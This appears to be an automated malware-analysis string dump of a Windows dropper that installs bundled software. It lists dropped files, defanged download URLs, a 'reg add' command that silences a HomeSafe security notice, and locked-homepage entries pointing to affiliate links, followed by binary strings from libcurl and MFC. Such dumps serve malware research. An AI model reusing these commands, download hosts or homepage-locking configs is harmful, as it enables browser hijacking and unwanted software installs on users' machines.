HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall
D:\dream\ky.bat
D:\dream\ky.bat
hXXp://z13.cnzz.com/stat.htm?id=1256550373
hXXp://z13.cnzz.com/stat.htm?id=1256550373
D:\dream\b2.bat
D:\dream\b2.bat
D:\dream\2k1
D:\dream\2k1
hXXp://t.cn/RGHZM4u
hXXp://t.cn/RGHZM4u
D:\dream\2k2
D:\dream\2k2
hXXp://t.cn/RGHZx7C
hXXp://t.cn/RGHZx7C
D:\dream\k1
D:\dream\k1
D:\dream\k2
D:\dream\k2
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe -s1
D:\dream\2345pic_k1252705.exe -s1
2345pic_k1252705.exe
2345pic_k1252705.exe
C:\Users\
C:\Users\
%Documents and Settings%\
%Documents and Settings%\
D:\dream\1.bat
D:\dream\1.bat
hXXp://z4.cnzz.com/stat.htm?id=1254275459
hXXp://z4.cnzz.com/stat.htm?id=1254275459
D:\dream\dd2b1
D:\dream\dd2b1
hXXp://t.cn/RGHZ6Au
hXXp://t.cn/RGHZ6Au
D:\dream\dd2b2
D:\dream\dd2b2
hXXp://t.cn/RGHZ6YL
hXXp://t.cn/RGHZ6YL
D:\dream\dd2b3
D:\dream\dd2b3
hXXp://t.cn/RGHZXw9
hXXp://t.cn/RGHZXw9
D:\dream\dd2b4
D:\dream\dd2b4
hXXp://t.cn/RGHZXXJ
hXXp://t.cn/RGHZXXJ
D:\dream\dd2b5
D:\dream\dd2b5
hXXp://t.cn/RGHZXms
hXXp://t.cn/RGHZXms
D:\dream\dd2b6
D:\dream\dd2b6
hXXp://t.cn/RGHZaUC
hXXp://t.cn/RGHZaUC
D:\dream\dd2b7
D:\dream\dd2b7
hXXp://t.cn/RGHZaOe
hXXp://t.cn/RGHZaOe
D:\dream\2b1
D:\dream\2b1
D:\dream\2b2
D:\dream\2b2
D:\dream\2b3
D:\dream\2b3
D:\dream\2b4
D:\dream\2b4
D:\dream\2b5
D:\dream\2b5
D:\dream\2b6
D:\dream\2b6
D:\dream\2b7
D:\dream\2b7
D:\dream\2345explorer_k1252705.exe
D:\dream\2345explorer_k1252705.exe
D:\dream\2345explorer_k1252705.exe -s1
D:\dream\2345explorer_k1252705.exe -s1
2345explorer_k1252705.exe
2345explorer_k1252705.exe
D:\dream\d2b.bat
D:\dream\d2b.bat
hXXp://z13.cnzz.com/stat.htm?id=1256619493
hXXp://z13.cnzz.com/stat.htm?id=1256619493
D:\dream\uc1
D:\dream\uc1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc1?public&code=8c8c3cd80ce9a0c57c016bb58fbe1fe5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc1?public&code=8c8c3cd80ce9a0c57c016bb58fbe1fe5
D:\dream\uc2
D:\dream\uc2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc2?public&code=88e179c33b3a9af4521dd59e1bd78eb9
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc2?public&code=88e179c33b3a9af4521dd59e1bd78eb9
D:\dream\uc3
D:\dream\uc3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc3?public&code=9938d6a66783aa39f17544f8dec6cf72
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc3?public&code=9938d6a66783aa39f17544f8dec6cf72
D:\dream\uc4
D:\dream\uc4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc4?public&code=152db8e9d36a28926ca9eb531995d289
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc4?public&code=152db8e9d36a28926ca9eb531995d289
D:\dream\uc5
D:\dream\uc5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc5?public&code=427d9e5007c4afb93302343de4f0ac69
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc5?public&code=427d9e5007c4afb93302343de4f0ac69
D:\dream\uc6
D:\dream\uc6
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc6?public&code=428fcf54b656f33b1a89098eda969ff3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc6?public&code=428fcf54b656f33b1a89098eda969ff3
D:\dream\lgeuc
D:\dream\lgeuc
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lge/lge?public&code=411f778b2af125c63e48c0bafb370ced
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lge/lge?public&code=411f778b2af125c63e48c0bafb370ced
D:\dream\BlueInstaller_bsvalkkx_101101_.exe
D:\dream\BlueInstaller_bsvalkkx_101101_.exe
D:\dream\BlueResource.bpk
D:\dream\BlueResource.bpk
set "w71=Microsoft\Windows\Start Menu\Programs"
set "w71=Microsoft\Windows\Start Menu\Programs"
set "w72=Microsoft\Windows\Start Menu"
set "w72=Microsoft\Windows\Start Menu"
"%USERPROFILE%\%xp1%"
"%USERPROFILE%\%xp1%"
"%ALLUSERSPROFILE%\%xp1%"
"%ALLUSERSPROFILE%\%xp1%"
"%USERPROFILE%\%xp2%"
"%USERPROFILE%\%xp2%"
"%ALLUSERSPROFILE%\%xp2%"
"%ALLUSERSPROFILE%\%xp2%"
reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f
D:\dream\uc.bat
D:\dream\uc.bat
" URL="hXXp://VVV.hao123.com/?tn=96468612_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=96468612_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=97215765_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=97215765_hao_pg" IsLock="TRUE" />
" URL="hXXp://hao.360.cn/?src=lm&ls=n6f9da49b8f" IsLock="TRUE" />
" URL="hXXp://hao.360.cn/?src=lm&ls=n6f9da49b8f" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=96074770_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=96074770_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=96982550_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=96982550_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=95621234_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=95621234_hao_pg" IsLock="TRUE" />
C:\ProgramData\HomeSafe\start_config.xml
C:\ProgramData\HomeSafe\start_config.xml
%Documents and Settings%\All Users\Application Data\HomeSafe\start_config.xml
%Documents and Settings%\All Users\Application Data\HomeSafe\start_config.xml
hXXp://z11.cnzz.com/stat.htm?id=1254275466
hXXp://z11.cnzz.com/stat.htm?id=1254275466
D:\dream\js1
D:\dream\js1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js1?public&code=b1ee60115a4f70d315a979e9b6845c55
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js1?public&code=b1ee60115a4f70d315a979e9b6845c55
D:\dream\js2
D:\dream\js2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js2?public&code=d6b869e3aa48ef860876b5403764d3d8
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js2?public&code=d6b869e3aa48ef860876b5403764d3d8
D:\dream\js3
D:\dream\js3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js3?public&code=20b0530111249bd0649013a5f42afc61
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js3?public&code=20b0530111249bd0649013a5f42afc61
D:\dream\duba_u20862342_sv1_3_18.exe
D:\dream\duba_u20862342_sv1_3_18.exe
hXXp://z13.cnzz.com/stat.htm?id=1256627376
hXXp://z13.cnzz.com/stat.htm?id=1256627376
D:\dream\bjzy
D:\dream\bjzy
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240
D:\dream\LockPage.exe
D:\dream\LockPage.exe
hXXp://z11.cnzz.com/stat.htm?id=1256550363
hXXp://z11.cnzz.com/stat.htm?id=1256550363
::0:0@>@>:0:0:
::0:0@>@>:0:0:
xjj%uI
xjj%uI
:0@>@>:0:0:
:0@>@>:0:0:
4qP.rk%
4qP.rk%
B&.Ct
B&.Ct
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.2.18
1.2.18
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
portuguese-brazilian
portuguese-brazilian
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
(*.avi)|*.avi
(*.avi)|*.avi
WPFT532.CNV
WPFT532.CNV
WPFT632.CNV
WPFT632.CNV
EXCEL32.CNV
EXCEL32.CNV
write32.wpc
write32.wpc
Windows Write
Windows Write
mswrd632.wpc
mswrd632.wpc
Word for Windows 6.0
Word for Windows 6.0
wword5.cnv
wword5.cnv
Word for Windows 5.0
Word for Windows 5.0
mswrd832.cnv
mswrd832.cnv
mswrd632.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
Word 6.0/95 for Windows & Macintosh
html32.cnv
html32.cnv
VVV.dywt.com.cn
VVV.dywt.com.cn
Service Pack %d
Service Pack %d
Windows 2003
Windows 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
Windows NT
Windows NT
Windows ??
Windows ??
Windows Millenium Edition
Windows Millenium Edition
Windows 98 Second Edition
Windows 98 Second Edition
Windows 98 SP1
Windows 98 SP1
Windows 98
Windows 98
Windows 95 OSR2
Windows 95 OSR2
Windows 95 SP1
Windows 95 SP1
Windows 95
Windows 95
Windows CE
Windows CE
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 95
Windows Server 2008 R2
Windows Server 2008 R2
Windows 7
Windows 7
Windows Server 2008
Windows Server 2008
Windows Vista
Windows Vista
Microsoft Windows 2003
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows NT
Microsoft Windows NT
KERNEL32.DLL
KERNEL32.DLL
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÃ
zcÃ
c:\%original file name%.exe
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
GetCPInfo
GetWindowsDirectoryA
GetWindowsDirectoryA
WinExec
WinExec
GetProcessHeap
GetProcessHeap
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
GetViewportExtEx
GetViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
ShellExecuteA
ShellExecuteA
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
CreateDialogIndirectParamA
CreateDialogIndirectParamA
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
(*.*)
(*.*)
2345pic_k1252705.exe_1360:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
RegDeleteKeyExW
RegDeleteKeyExW
Kernel32.DLL
Kernel32.DLL
PSAPI.DLL
PSAPI.DLL
%s=%s
%s=%s
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationW
SHFileOperationW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegEnumKeyW
RegEnumKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
uo.HU
uo.HU
:U-Rw}
:U-Rw}
?:,.tR
?:,.tR
Thawte Certification1
Thawte Certification1
hXXp://ocsp.thawte.com0
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.Class 3 Public Primary Certification Authority0
.Class 3 Public Primary Certification Authority0
hXXp://crl.verisign.com/pca3.crl0
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0
hXXp://ocsp.verisign.com0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2345.com1>0
2345.com1>0
2345.com0
2345.com0
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/cps0*
#hXXp://crl.verisign.com/pca3-g5.crl04
#hXXp://crl.verisign.com/pca3-g5.crl04
pic.2345.com0
pic.2345.com0
Nullsoft Install System v2.46-Unicode
Nullsoft Install System v2.46-Unicode
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
*?|/":
*?|/":
adm\LOCALS~1\Temp\nss3.tmp\RCWidgetPlugin.dll
adm\LOCALS~1\Temp\nss3.tmp\RCWidgetPlugin.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss3.tmp\RCWidgetPlugin.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss3.tmp\RCWidgetPlugin.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss3.tmp
nss3.tmp
nss3.tmp
s3.tmp
s3.tmp
\dream\2345pic_k1252705.exe -s1
\dream\2345pic_k1252705.exe -s1
D:\dream\2345pic_k1252705.exe -s1
D:\dream\2345pic_k1252705.exe -s1
%Program Files%\2345Soft\2345Pic
%Program Files%\2345Soft\2345Pic
D:\dream
D:\dream
2345pic_k1252705.exe
2345pic_k1252705.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe
1442016
1442016
-1928723989
-1928723989
1048850
1048850
1114382
1114382
1048898
1048898
1179954
1179954
1245398
1245398
1048888
1048888
1245402
1245402
Windows 5.1(Service Pack 3)
Windows 5.1(Service Pack 3)
2345.com
2345.com
6.1.1.7158
6.1.1.7158
(c) 2016 2345.com
(c) 2016 2345.com
svchost.exe_220:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
NtOpenKey
NtOpenKey
svchost.pdb
svchost.pdb
\PIPE\
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
duba_u20862342_sv1_3_18.exe_632:
`.rsrc
`.rsrc
u%SSSWSSSh
u%SSSWSSSh
9.Wt$9n
9.Wt$9n
u`SSh
u`SSh
8%uAP3
8%uAP3
t$SSh
t$SSh
PSSSSSSh
PSSSSSSh
aSSSh
aSSSh
.VVVVVSRSSj
.VVVVVSRSSj
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
t.Jt Jt
t.Jt Jt
8.tmpu
8.tmpu
kernel32.dll
kernel32.dll
gdiplus.dll
gdiplus.dll
.mixcrt
.mixcrt
KERNEL32.DLL
KERNEL32.DLL
mscoree.dll
mscoree.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
WS2_32.dll
WS2_32.dll
%s:%d
%s:%d
WARNING: failed to save cookies in %s
WARNING: failed to save cookies in %s
About to connect() to %s%s port %ld (#%ld)
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode (UTF-8) domains
IDN support not present, can't parse Unicode (UTF-8) domains
Protocol %s not supported or disabled in libcurl
Protocol %s not supported or disabled in libcurl
malformed
malformed
:]://%[^
:]://%[^
[^:]:%[^
[^:]:%[^
http_proxy
http_proxy
%5[^:@]:%5[^@]
%5[^:@]:%5[^@]
:%5[^@]
:%5[^@]
Port number too large: %lu
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
%s://%s%s%s:%hu%s%s%s
;type=%c
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
User-Agent: %s
Re-using existing connection! (#%ld) with host %s
Re-using existing connection! (#%ld) with host %s
%s://%s
%s://%s
Connection #%ld to host %s left intact
Connection #%ld to host %s left intact
operation aborted by callback
operation aborted by callback
ioctl callback returned error %d
ioctl callback returned error %d
the ioctl callback returned %d
the ioctl callback returned %d
seek callback returned error %d
seek callback returned error %d
Received problem %d in the chunky parser
Received problem %d in the chunky parser
HTTP server doesn't seem to support byte ranges. Cannot resume.
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Added %s:%d:%s to DNS cache
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
Resolve %s found illegal!
%5[^:]:%d:%5s
%5[^:]:%d:%5s
No URL set!
No URL set!
[^?&/:]://%c
[^?&/:]://%c
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Disables POST, goes with %s
Issue another request to this URL: '%s'
Issue another request to this URL: '%s'
unspecified error %d
unspecified error %d
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
#HttpOnly_
httponly
httponly
I99[^;
I99[^;
skipped cookie with bad tailmatch domain: %s
skipped cookie with bad tailmatch domain: %s
skipped cookie with illegal dotcount domain: %s
skipped cookie with illegal dotcount domain: %s
23[^;=]=I99[^;
23[^;=]=I99[^;
%s%s%s
%s%s%s
# Fatal libcurl error
# Fatal libcurl error
# Netscape HTTP Cookie File
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
# This file was generated by libcurl! Edit at your own risk.
[%s %s %s]
[%s %s %s]
Send failure: %s
Send failure: %s
Recv failure: %s
Recv failure: %s
bind failed with errno %d: %s
bind failed with errno %d: %s
Local port: %hu
Local port: %hu
getsockname() failed with errno %d: %s
getsockname() failed with errno %d: %s
Bind to local port %hu failed, trying next
Bind to local port %hu failed, trying next
Couldn't bind to '%s'
Couldn't bind to '%s'
Name '%s' family %i resolved to '%s' family %i
Name '%s' family %i resolved to '%s' family %i
Local Interface %s is ip %s using address family %i
Local Interface %s is ip %s using address family %i
ssloc inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getpeername() failed with errno %d: %s
getpeername() failed with errno %d: %s
TCP_NODELAY set
TCP_NODELAY set
Could not set TCP_NODELAY: %s
Could not set TCP_NODELAY: %s
Failed to connect to %s: %s
Failed to connect to %s: %s
Trying %s...
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
%d.%d.%d.%d
%d.%d.%d.%d
Could not resolve host: %s; %s
Could not resolve host: %s; %s
Could not resolve proxy: %s; %s
Could not resolve proxy: %s; %s
getaddrinfo() failed for %s:%d; %s
getaddrinfo() failed for %s:%d; %s
init_resolve_thread() failed for %s; %s
init_resolve_thread() failed for %s; %s
%sAuthorization: Basic %s
%sAuthorization: Basic %s
%s:%s
%s:%s
%s auth using %s with user '%s'
%s auth using %s with user '%s'
HTTP/
HTTP/
Avoided giant realloc for header (max is %d)!
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
The requested URL returned error: %d
If-Unmodified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Last-Modified: %s
If-Modified-Since: %s
If-Modified-Since: %s
%s, d %s M d:d:d GMT
%s, d %s M d:d:d GMT
Failed sending HTTP POST request
Failed sending HTTP POST request
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Internal HTTP POST error!
Internal HTTP POST error!
Failed sending HTTP request
Failed sending HTTP request
%s%s=%s
%s%s=%s
%s HTTP/%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
PTF://%s:%s@%s
PTF://%s:%s@%s
Content-Range: bytes %s/%lld
Content-Range: bytes %s/%lld
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s%lld/%lld
Range: bytes=%s
Range: bytes=%s
PTF://
PTF://
Host: %s%s%s:%hu
Host: %s%s%s:%hu
Host: %s%s%s
Host: %s%s%s
Chunky upload is not supported by HTTP 1.0
Chunky upload is not supported by HTTP 1.0
Accept-Encoding: %s
Accept-Encoding: %s
Referer: %s
Referer: %s
HTTP/1.0 connection set to keep alive!
HTTP/1.0 connection set to keep alive!
HTTP/1.1 proxy connection set close!
